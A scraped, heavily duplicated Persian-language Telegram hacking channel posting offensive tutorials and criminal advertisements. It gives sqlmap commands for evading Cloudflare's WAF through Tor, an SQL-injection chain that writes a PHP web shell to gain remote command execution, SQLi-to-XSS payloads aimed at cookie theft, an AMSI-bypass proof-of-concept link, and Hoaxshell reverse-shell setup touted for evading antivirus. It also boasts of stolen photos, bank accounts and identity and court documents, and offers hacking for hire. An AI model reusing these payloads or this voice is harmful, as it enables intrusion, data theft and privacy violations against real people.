Forwarded from 𝗣𝗮𝗿𝗮𝗻𝗼𝗶𝗮 𝗧𝗕
Please open Telegram to view this post
VIEW IN TELEGRAM
نحوه بای پس WAF با sqlmap
اول از همه، شما باید مطمئن شوید که سایت مورد نظر توسط Cloudflare محافظت می شود، می توانید برای تایید " — ID-waf" را اضافه کنید. با این حال، " — thread=" را بزرگتر از 1 قرار ندهید زیرا هدف به شما خطای "403 Forbidden" می دهد. هنگامی که "خطای 403" را دریافت کردید، آدرس IP شما بلاک می شود. بنابراین، شما باید در نظر داشته باشید که از سرورهای پروکسی یا TOR برای دسترسی به هدف استفاده کنید.
شما باید " — tamper='between,randomcase,space2comment'" و "-v 3" رو اضافه کنید ، در صورتی که هدف محافظت شده توسط Cloudflare تایید شده باشد. همچنین میتوانید در صورت لزوم «--random-agent» و «-tor» را اضافه کنید.
برای استفاده موفقیت آمیز tor ممکن است نیاز به نصب privoxy داشته باشید
#NULL🖤
https://t.me/Kali_Linux_NULL
اول از همه، شما باید مطمئن شوید که سایت مورد نظر توسط Cloudflare محافظت می شود، می توانید برای تایید " — ID-waf" را اضافه کنید. با این حال، " — thread=" را بزرگتر از 1 قرار ندهید زیرا هدف به شما خطای "403 Forbidden" می دهد. هنگامی که "خطای 403" را دریافت کردید، آدرس IP شما بلاک می شود. بنابراین، شما باید در نظر داشته باشید که از سرورهای پروکسی یا TOR برای دسترسی به هدف استفاده کنید.
شما باید " — tamper='between,randomcase,space2comment'" و "-v 3" رو اضافه کنید ، در صورتی که هدف محافظت شده توسط Cloudflare تایید شده باشد. همچنین میتوانید در صورت لزوم «--random-agent» و «-tor» را اضافه کنید.
برای استفاده موفقیت آمیز tor ممکن است نیاز به نصب privoxy داشته باشید
sudo apt install privoxy -yدر نهایت حمله را شروع کنید!
sudo /etc/init.d/privoxy start
python sqlmap.py -u "https://www.target.com/" --identify-waf --tamper="between,randomcase,space2comment" -v 3 --random-agent --tor#Sqlmap
#NULL🖤
https://t.me/Kali_Linux_NULL
اولین کاری که انجام می دهیم این است که بررسی کنیم sql در کجا روی سرور اجرا می شود. این کار با تزریق دستور @@datadir به پرس و جوی sql انجام می شود تا مسیر کامل مکان آن در سرور به دست آید.
مثال:
با فرض اینکه بازتابی را در ستون دوم پیدا کنیم، بار زیر را وارد خواهیم کرد:
C:\xampp\mysql\data\
چگونه SQLI به RCE را اجرا کنیم؟
با توجه به مسیر می توانیم استنباط کنیم که سرور از xampp استفاده می کند و اگر بخواهیم یک فایل ایجاد کنیم و از سرور به آن دسترسی داشته باشیم باید آن را در C:\xampp\htdocs
با توجه به این اطلاعات، در حال حاضر امکان ایجاد پیلود برای شل وجود دارد:
مثال:
و تمام، ما یک شل معکوس در سیستم ایجاد کردیم. اکنون فقط برای دسترسی به آن از خارج (وب) باقی مانده است. و این کار از لینک زیر انجام می شود:
مثال:
با فرض اینکه بازتابی را در ستون دوم پیدا کنیم، بار زیر را وارد خواهیم کرد:
union select 1,@@datadir,3,4 --و خروجی به صورت زیر خواهد بود:
C:\xampp\mysql\data\
چگونه SQLI به RCE را اجرا کنیم؟
با توجه به مسیر می توانیم استنباط کنیم که سرور از xampp استفاده می کند و اگر بخواهیم یک فایل ایجاد کنیم و از سرور به آن دسترسی داشته باشیم باید آن را در C:\xampp\htdocs
با توجه به این اطلاعات، در حال حاضر امکان ایجاد پیلود برای شل وجود دارد:
union select 1,<php_payload>,3,4 into outfile <path> --
مثال:
union select 1,'<?php system($_GET["cmd"]); ?>',3,4 intooutfile 'C:\\xampp\\htdocs\\rce.php' --
و تمام، ما یک شل معکوس در سیستم ایجاد کردیم. اکنون فقط برای دسترسی به آن از خارج (وب) باقی مانده است. و این کار از لینک زیر انجام می شود:
<host>/rce.php?cmd=<command>
برای رسیدن به SiXSS باید مراحل زیر را طی کنیم.
من این روش را خیلی دوست ندارم زیرا خطا را در صفحه وب فلش می کند و در بسیاری از موارد ممکن است کل صفحه را دریافت نکنید، اما فقط یک صفحه خالی با خطا است و اصلا جالب نیست. اما از آنجایی که این یکی از راهها نیز هست، به عنوان مثال یک وبسایت آسیبپذیر را در نظر میگیریم.
exploitable-web.com/link.php?id=1
وقتی یک نقل قول را در انتهای وب سایت قرار می دهیم ممکن است با خطای مشابه مواجه شویم.
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1'' at line 1
خوب این اولین نکته ای است که می توانیم XSS را به وب سایت تزریق کنیم. بنابراین این بار به جای تنها نقل قول، این را تزریق می کنیم:
تزریق پیلود ما:
جمع اوری و ترجمه شده از سایت Sqli to Xss
من این روش را خیلی دوست ندارم زیرا خطا را در صفحه وب فلش می کند و در بسیاری از موارد ممکن است کل صفحه را دریافت نکنید، اما فقط یک صفحه خالی با خطا است و اصلا جالب نیست. اما از آنجایی که این یکی از راهها نیز هست، به عنوان مثال یک وبسایت آسیبپذیر را در نظر میگیریم.
exploitable-web.com/link.php?id=1
وقتی یک نقل قول را در انتهای وب سایت قرار می دهیم ممکن است با خطای مشابه مواجه شویم.
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1'' at line 1
خوب این اولین نکته ای است که می توانیم XSS را به وب سایت تزریق کنیم. بنابراین این بار به جای تنها نقل قول، این را تزریق می کنیم:
' ;<img src=x onerror=prompt(/XSS/)>
تزریق بالا یک کادر محاوره ای را نشان می دهد که XSS می گوید. این یکی حمله اساسی است. حالا بیایید ببینیم چگونه می توانیم XSS را به روشی بهتر تزریق کنیم. تزریق XSS به Query. هنگامی که دریافت Number of Column انجام شد و ما برای Union Query آماده هستیم. فرض کنید 4 ستون داریم، بنابراین کوئری اتحادیه ما به صورت زیر خواهد بود:http://exploitable-web.com/link.php?id=1' union select 1,2,3,4--
فرض کنید ستون 3 به عنوان خروجی در صفحه وب چاپ می شود. بنابراین بار XSS خود را به آن تزریق می کنیم. برای ساده کردن کارها، بار خود را به صورت هگز کدگذاری می کنیم. بار تزریق XSS ما :<img src=x onerror=confirm(/XSS/)>
مقدار کدگذاری شده Hex :0x3c696d67207372633d78206f6e6572726f723d636f6e6669726d282f5853532f293e
تزریق پیلود ما:
http://exploitable-web.com/link.php?id=-1' union select 1,2,0x3c696d67207372633d78206f6e6572726f723d636f6e6669726d282f5853532f293e,4--
لینک XSS ما را به وب سایت خروجی می دهد. این یکی از پیلود های اولیه XSS است، اکنون ما آزاد هستیم تا با استفاده از XSS کارهای دیگری مانند سرقت کوکی، فیشینگ XSS، فیشینگ XSS iFrame، XSS زنجیرهای، ربودن جلسه، حمله CSRF، XssDdos و سایر حملات را انجام دهیم . Forwarded from زاپاس
🎃رفع فیلتری روبیکا آموزشش فروخته میشود میتونی تو ۴ساعت اکانت روبیکات رفع کنی😱🔰
@Radkor_report
آیدی بنده☝️
https://t.me/Kali_Linux_NULL
https://t.me/Program_writing
@Radkor_report
آیدی بنده☝️
https://t.me/Kali_Linux_NULL
https://t.me/Program_writing
Forwarded from ᴛᴀʙ ʟɪꜱᴛ ꜱᴛᴇᴠᴇɴ ᴋɴɪɢʜᴛ
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from هک شدگان
بسم رب چشای اونی که کنارم نیست🖤
زدن تیمNULL چند اتک کوچیک
Targat1
زدن قفلی483تا روبیکا🔰
Targat2
هک شدن چند عکس دختر
Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot
Targat3
13شماره هک شده توسط بنده
Targat4
هک کردن چند شماره حساب بانکی
Targat5
چند شناسنامه های فرد
Shot Shot Shot Shot
Targat6
چند مدارک دادگاهی یه فرد 🐇
Shot Shot Shot Shot Shot Shot Shot Shot Shot
Targat7
هک شدن چند ایمیل
برای درخواست هک پی بنده🎃
@Radkor_report
معاشرت گپ چنلمون🧪
https://t.me/NULL_KALI_LINUX
زدن تیمNULL چند اتک کوچیک
زدن قفلی483تا روبیکا🔰
Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot
13شماره هک شده توسط بنده
هک کردن چند شماره حساب بانکی
Shot Shot Shot Shot
Shot Shot Shot Shot Shot Shot Shot Shot Shot
هک شدن چند ایمیل
برای درخواست هک پی بنده🎃
@Radkor_report
معاشرت گپ چنلمون🧪
https://t.me/NULL_KALI_LINUX
آسیب پذیری های Web Cache با توجه به معماری های جدید نرمافزاری میتونن برای یک کسبوکار کاملا خطرناک باشن، مثلا Paypal برای آسیب پذیری DoS از این طریق 9700$ بانتی داده
اسکنر زیر میتونه گزینه خوبی جهت آزمایش این نوع از آسیب پذیری ها باشه
https://github.com/Hackmanit/Web-Cache-Vulnerability-Scanner
#NULL🖤
https://t.me/Kali_Linux_NULL
اسکنر زیر میتونه گزینه خوبی جهت آزمایش این نوع از آسیب پذیری ها باشه
https://github.com/Hackmanit/Web-Cache-Vulnerability-Scanner
#NULL🖤
https://t.me/Kali_Linux_NULL
GitHub
GitHub - Hackmanit/Web-Cache-Vulnerability-Scanner: Web Cache Vulnerability Scanner is a Go-based CLI tool for testing for web…
Web Cache Vulnerability Scanner is a Go-based CLI tool for testing for web cache poisoning. It is developed by Hackmanit GmbH (http://hackmanit.de/). - Hackmanit/Web-Cache-Vulnerability-Scanner
آسیب پذیری که منجر به AMSI BYPASS می شود
حالا اصلا AMSI چیه؟
معرفی آسیبپذیری AMSI
رابط اسکن ضد بدافزار مایکروسافت (AMSI) که در ویندوز 10 و نسخه های بعدی ویندوز موجود است، برای کمک به شناسایی و جلوگیری از بدافزار طراحی شده است. AMSI رابطی است که برنامههای امنیتی مختلف (مانند نرمافزارهای آنتی ویروس یا ضد بدافزار) را در برنامهها و نرمافزارها ادغام میکند و رفتار آنها را قبل از اجرا بررسی میکند. مربی فنی OffSec، Victor "Vixx" Khoury یک ورودی قابل نوشتن در System.Management.Automation.dll کشف کرد که حاوی آدرس AmsiScanBuffer ، یک جزء مهم AMSI است که باید فقط خواندنی علامت گذاری می شد، شبیه به جدول آدرس واردات (IAT) ورودی های. در این پست وبلاگ، این آسیبپذیری را تشریح میکنیم و نشان میدهیم که چگونه Vixx از آن در یک دور زدن AMSI 0 روزه استفاده کرده است. این آسیبپذیری در ۸ آوریل ۲۰۲۴ به مایکروسافت گزارش شد.
اطلاعات کامل - https://www.offsec.com/offsec/amsi-write-raid-0day-vulnerability/
POC - https://github.com/V-i-x-x/AMSI-BYPASS
#NULL🖤
https://t.me/Kali_Linux_NULL
حالا اصلا AMSI چیه؟
معرفی آسیبپذیری AMSI
رابط اسکن ضد بدافزار مایکروسافت (AMSI) که در ویندوز 10 و نسخه های بعدی ویندوز موجود است، برای کمک به شناسایی و جلوگیری از بدافزار طراحی شده است. AMSI رابطی است که برنامههای امنیتی مختلف (مانند نرمافزارهای آنتی ویروس یا ضد بدافزار) را در برنامهها و نرمافزارها ادغام میکند و رفتار آنها را قبل از اجرا بررسی میکند. مربی فنی OffSec، Victor "Vixx" Khoury یک ورودی قابل نوشتن در System.Management.Automation.dll کشف کرد که حاوی آدرس AmsiScanBuffer ، یک جزء مهم AMSI است که باید فقط خواندنی علامت گذاری می شد، شبیه به جدول آدرس واردات (IAT) ورودی های. در این پست وبلاگ، این آسیبپذیری را تشریح میکنیم و نشان میدهیم که چگونه Vixx از آن در یک دور زدن AMSI 0 روزه استفاده کرده است. این آسیبپذیری در ۸ آوریل ۲۰۲۴ به مایکروسافت گزارش شد.
اطلاعات کامل - https://www.offsec.com/offsec/amsi-write-raid-0day-vulnerability/
POC - https://github.com/V-i-x-x/AMSI-BYPASS
#NULL🖤
https://t.me/Kali_Linux_NULL
OffSec
AMSI Write Raid Bypass Vulnerability | OffSec
In this blog post, we'll introduce a new bypass technique designed to bypass AMSI without the VirtualProtect API and without changing memory protection.
Forwarded from زاپاس
🎃رفع فیلتری روبیکا آموزشش فروخته میشود میتونی تو ۴ساعت اکانت روبیکات رفع کنی😱🔰
@Radkor_report
آیدی بنده☝️
https://t.me/Kali_Linux_NULL
https://t.me/Program_writing
@Radkor_report
آیدی بنده☝️
https://t.me/Kali_Linux_NULL
https://t.me/Program_writing
ابزار Hoaxshell 🕷
با استفاده از این ابزار میتونید خیلی راحت پیلود reverse shell بسازید یا به عبارتی دیگر با استفاده از پیلود ساخته شده با این ابزار میتونید دسترسی شل از سیستم بگیرید !💀
➖➖➖➖➖➖➖➖➖
این ابزار قادر به ساخت پیلودی است که به راحتی با آنتی ویروس ها شناسایی نمیشه !🕷️
🟡خب بریم برای نصب : 💥
🐱 git clone https://github.com/t3l3machus/hoaxshell
cd ./hoaxshell
sudo pip3 install -r requirements.txt
chmod +x hoaxshell.py
بعد نصب برای ساخت پیلود دستور زیرو بزنید 💀
sudo python3 hoaxshell.py -s <your_ip>
➖➖➖➖➖➖➖➖➖
بعد توی خروجی شما با یه کد مواجه میشید اون اصل کاری هستش و باید توی PowerShell یا CMD سیستم مورد نظر وارد کنید !⚡
⚡رفقا به این پست ریکشن بزنید.
😈 فردا میریم برای ریکورد و حمله خارج از شبکه با استفاده از
این پیلود reverse shell 🟦
ببینم چه میکنید .☠️
📱 #NULL🖤
https://t.me/Kali_Linux_NULL🖱
🔤🔤🔤🔤🔤🔤 🔤🔤🔤🔤
با استفاده از این ابزار میتونید خیلی راحت پیلود reverse shell بسازید یا به عبارتی دیگر با استفاده از پیلود ساخته شده با این ابزار میتونید دسترسی شل از سیستم بگیرید !💀
➖➖➖➖➖➖➖➖➖
این ابزار قادر به ساخت پیلودی است که به راحتی با آنتی ویروس ها شناسایی نمیشه !🕷️
🟡خب بریم برای نصب : 💥
🐱 git clone https://github.com/t3l3machus/hoaxshell
cd ./hoaxshell
sudo pip3 install -r requirements.txt
chmod +x hoaxshell.py
بعد نصب برای ساخت پیلود دستور زیرو بزنید 💀
sudo python3 hoaxshell.py -s <your_ip>
➖➖➖➖➖➖➖➖➖
بعد توی خروجی شما با یه کد مواجه میشید اون اصل کاری هستش و باید توی PowerShell یا CMD سیستم مورد نظر وارد کنید !⚡
⚡رفقا به این پست ریکشن بزنید.
😈 فردا میریم برای ریکورد و حمله خارج از شبکه با استفاده از
این پیلود reverse shell 🟦
ببینم چه میکنید .☠️
📱 #NULL🖤
https://t.me/Kali_Linux_NULL🖱
🔤🔤🔤🔤🔤🔤 🔤🔤🔤🔤
GitHub
GitHub - t3l3machus/hoaxshell: A Windows reverse shell payload generator and handler that abuses the http(s) protocol to establish…
A Windows reverse shell payload generator and handler that abuses the http(s) protocol to establish a beacon-like reverse shell. - t3l3machus/hoaxshell
Forwarded from VIP
شماره مجازی انگلیس ( پرمیوم )
+44 73896**776
اکانت یک ساله دستمه تضمینه
پرمیومش دو ماه وقت داره
قابلیت چنچ داره و ایمیلی هستش
کارت به کارت فقط
@Cadillacm < جهت خرید پیام بدید
اکانت شماره مجازی جاهای دیگه هم موجوده
+44 73896**776
اکانت یک ساله دستمه تضمینه
پرمیومش دو ماه وقت داره
قابلیت چنچ داره و ایمیلی هستش
کارت به کارت فقط
@Cadillacm < جهت خرید پیام بدید
اکانت شماره مجازی جاهای دیگه هم موجوده
Forwarded from ᴛᴀʙ ʟɪꜱᴛ ꜱᴛᴇᴠᴇɴ ᴋɴɪɢʜᴛ
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from زاپاس
اک یه نوب آیدی نداشت❤️
خرید پکیچ پی بنده🧪
@Radkor_report
@Mmd_Yadgari
چنلمون🎃
https://t.me/Kali_Linux_NULL
https://t.me/Program_writing
خرید پکیچ پی بنده🧪
@Radkor_report
@Mmd_Yadgari
چنلمون🎃
https://t.me/Kali_Linux_NULL
https://t.me/Program_writing
Forwarded from زاپاس
🎃رفع فیلتری روبیکا آموزشش فروخته میشود میتونی تو ۴ساعت اکانت روبیکات رفع کنی😱🔰
@Radkor_report
آیدی بنده☝️
https://t.me/Kali_Linux_NULL
https://t.me/Program_writing
@Radkor_report
آیدی بنده☝️
https://t.me/Kali_Linux_NULL
https://t.me/Program_writing
Forwarded from زاپاس
خام بود❤️
خرید پکیچ پی بنده🧪
@Radkor_report
@Mmd_Yadgari
چنلمون🎃
https://t.me/Kali_Linux_NULL
https://t.me/Program_writing
خرید پکیچ پی بنده🧪
@Radkor_report
@Mmd_Yadgari
چنلمون🎃
https://t.me/Kali_Linux_NULL
https://t.me/Program_writing